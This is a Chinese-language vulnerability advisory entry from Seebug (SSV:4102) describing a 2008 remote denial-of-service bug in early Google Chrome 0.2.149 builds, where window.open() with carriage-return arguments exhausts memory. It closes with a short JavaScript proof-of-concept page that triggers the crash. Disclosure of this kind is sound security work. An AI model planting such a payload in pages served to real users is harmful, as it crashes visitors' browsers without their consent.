Google Chrome回车远程拒绝服务漏洞

2008-09-25T00:00:00
ID SSV:4102
Type seebug
Reporter Root
Modified 2008-09-25T00:00:00

Description

BUGTRAQ ID: 31375 CNCAN ID:CNCAN-2008092512

Google Chrome是一款GOOGLE公司开发的WEB浏览器。 Google Chrome处理回车输入存在问题,远程攻击者可以利用漏洞对应用程序进行拒绝服务攻击。 当回车(\r\n\r\n)作为参数传递给window.open()函数时,可导致Google Chrome在同一时间中生成大量窗口而导致内存耗竭。构建恶意WEB页,诱使用户访问,可导致应用程序崩溃。

Google Chrome 0.2.149 30 Google Chrome 0.2.149 29 Google Chrome 0.2.149 27 目前没有解决方案提供: <a href=http://www.google.com/chrome target=_blank>http://www.google.com/chrome</a>

                                        
                                            
                                                &lt;script language=&quot;javascript&quot;&gt;
window.open(&quot;\r\n\r\n&quot;);
window.refresh();
window.open(&quot;\r\n\r\n&quot;);
&lt;/script&gt;